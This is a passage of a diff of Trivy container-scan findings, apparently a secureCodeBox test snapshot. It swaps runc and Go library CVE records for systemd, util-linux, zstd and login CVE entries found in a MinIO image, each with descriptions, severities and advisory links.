"URL", - "value": "https://github.com/advisories/GHSA-f3fp-gc8g-vw66", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/commit/98fe566c527479195ce3c8167136d2a555fe6b65", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/commit/d04de3a9b72d7a2455c1885fc75eb36d02cd17b5", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/releases/tag/v1.1.2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-f3fp-gc8g-vw66", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29162.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8090.html", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVPZBV7ISA7QKRPTC7ZXWKMIQI2HZEBB/", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D77CKD3AXPMU4PMQIQI5Q74SI4JATNND/", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GPQU4YC4AAY54JDXGDQHJEYKSXXG5T2Y/", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29162", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6088-2", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29162", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/05/12/1", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.1.5", - "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2023-28642", - "installedVersion": "v1.0.1", - "packageName": "github.com/opencontainers/runc", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-28642", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28642", - "https://github.com/advisories/GHSA-g2j6-57v7-gm8c", - "https://github.com/opencontainers/runc/pull/3785", - "https://github.com/opencontainers/runc/security/advisories/GHSA-g2j6-57v7-gm8c", - "https://nvd.nist.gov/vuln/detail/CVE-2023-28642", - "https://ubuntu.com/security/notices/USN-6088-1", - "https://ubuntu.com/security/notices/USN-6088-2", - "https://www.cve.org/CVERecord?id=CVE-2023-28642", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, "category": "Vulnerability", - "description": "runc is a CLI tool for spawning and running containers according to the OCI specification. It was found that AppArmor can be bypassed when \`/proc\` inside the container is symlinked with a specific mount configuration. This issue has been fixed in runc version 1.1.5, by prohibiting symlinked \`/proc\`. See PR #3785 for details. users are advised to upgrade. Users unable to upgrade should avoid using an untrusted container image.", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "AppArmor can be bypassed when \`/proc\` inside the container is symlinked with a specific mount configuration", + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-28642", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-28642", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28642", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-g2j6-57v7-gm8c", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/pull/3785", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-g2j6-57v7-gm8c", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-28642", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6088-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6088-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-28642", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.5", - "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2023-25809", - "installedVersion": "v1.0.1", - "packageName": "github.com/opencontainers/runc", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-25809", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25809", - "https://github.com/advisories/GHSA-m8cg-xc2p-r3fc", - "https://github.com/opencontainers/runc/commit/0d62b950e60f6980b54fe3bafd9a9c608dc1df17", - "https://github.com/opencontainers/runc/commit/0e6b818a2b0d24fdb6697614e5c5f115bbe8e3a5 (v1.1.5)", - "https://github.com/opencontainers/runc/security/advisories/GHSA-m8cg-xc2p-r3fc", - "https://nvd.nist.gov/vuln/detail/CVE-2023-25809", - "https://ubuntu.com/security/notices/USN-6088-1", - "https://ubuntu.com/security/notices/USN-6088-2", - "https://www.cve.org/CVERecord?id=CVE-2023-25809", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", ], }, "category": "Vulnerability", - "description": "runc is a CLI tool for spawning and running containers according to the OCI specification. In affected versions it was found that rootless runc makes \`/sys/fs/cgroup\` writable in following conditons: 1. when runc is executed inside the user namespace, and the \`config.json\` does not specify the cgroup namespace to be unshared (e.g.., \`(docker|podman|nerdctl) run --cgroupns=host\`, with Rootless Docker/Podman/nerdctl) or 2. when runc is executed outside the user namespace, and \`/sys\` is mounted with \`rbind, ro\` (e.g., \`runc spec --rootless\`; this condition is very rare). A container may gain the write access to user-owned cgroup hierarchy \`/sys/fs/cgroup/user.slice/...\` on the host . Other users's cgroup hierarchies are not affected. Users are advised to upgrade to version 1.1.5. Users unable to upgrade may unshare the cgroup namespace (\`(docker|podman|nerdctl) run --cgroupns=private)\`. This is the default behavior of Docker/Podman/nerdctl on cgroup v2 hosts. or add \`/sys/fs/cgroup\` to \`maskedPaths\`.", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "Rootless runc makes \`/sys/fs/cgroup\` writable", + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-25809", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-25809", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25809", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-m8cg-xc2p-r3fc", - }, - { - "type": "URL", - "value": "https://github.com/opencontainers/runc/commit/0d62b950e60f6980b54fe3bafd9a9c608dc1df17", - }, - { - "type": "URL", - "value": "https://github.com/opencontainers/runc/commit/0e6b818a2b0d24fdb6697614e5c5f115bbe8e3a5 (v1.1.5)", - }, - { - "type": "URL", - "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-m8cg-xc2p-r3fc", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-25809", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6088-1", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6088-2", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-25809", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20210817142637-7d9622a276b7", - "packageName": "golang.org/x/sys", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", - ], - }, - "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "faccessat checks wrong group", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/52313", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://go.dev/cl/399539", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", }, { "type": "URL", - "value": "https://go.dev/cl/400074", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", }, { "type": "URL", - "value": "https://go.dev/issue/52313", + "value": "https://ubuntu.com/security/notices/USN-5013-1", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://ubuntu.com/security/notices/USN-5013-2", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31437", + "installedVersion": "247.3-7", + "packageName": "libudev1", + "references": [ + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://avd.aquasec.com/nvd/cve-2023-31437", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://github.com/systemd/systemd/releases", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31438", + "installedVersion": "247.3-7", + "packageName": "libudev1", + "references": [ + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://avd.aquasec.com/nvd/cve-2023-31438", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "https://github.com/systemd/systemd/releases", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31439", + "installedVersion": "247.3-7", + "packageName": "libudev1", + "references": [ + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://avd.aquasec.com/nvd/cve-2023-31439", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": "https://github.com/systemd/systemd/releases", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'opt/bitnami/common/bin/wait-for-port' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20210510120138-977fb7262007", - "packageName": "golang.org/x/sys", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "libuuid1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", ], }, "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "faccessat checks wrong group", + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/52313", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://go.dev/cl/399539", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://go.dev/cl/400074", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://go.dev/issue/52313", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4899", + "installedVersion": "1.4.8+dfsg-2.1", + "packageName": "libzstd1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-4899", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", + "https://github.com/facebook/zstd/issues/3200", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", + "https://www.cve.org/CVERecord?id=CVE-2022-4899", + ], + }, + "category": "Vulnerability", + "description": "A vulnerability was found in zstd v1.4.10, where an attacker can supply empty string as an argument to the command line tool to cause buffer overrun.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "buffer overrun in util.c", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "value": "https://avd.aquasec.com/nvd/cve-2022-4899", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-4899", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://github.com/facebook/zstd/issues/3200", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4899", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.8.1-1", + "packageName": "login", + "references": [ + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", + ], + }, + "category": "Vulnerability", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "http://www.securityfocus.com/bid/26048", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "http://www.vupen.com/english/advisories/2007/3474", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": "https://issues.rpath.com/browse/RPL-1825", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.8.1-1", + "packageName": "login", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - 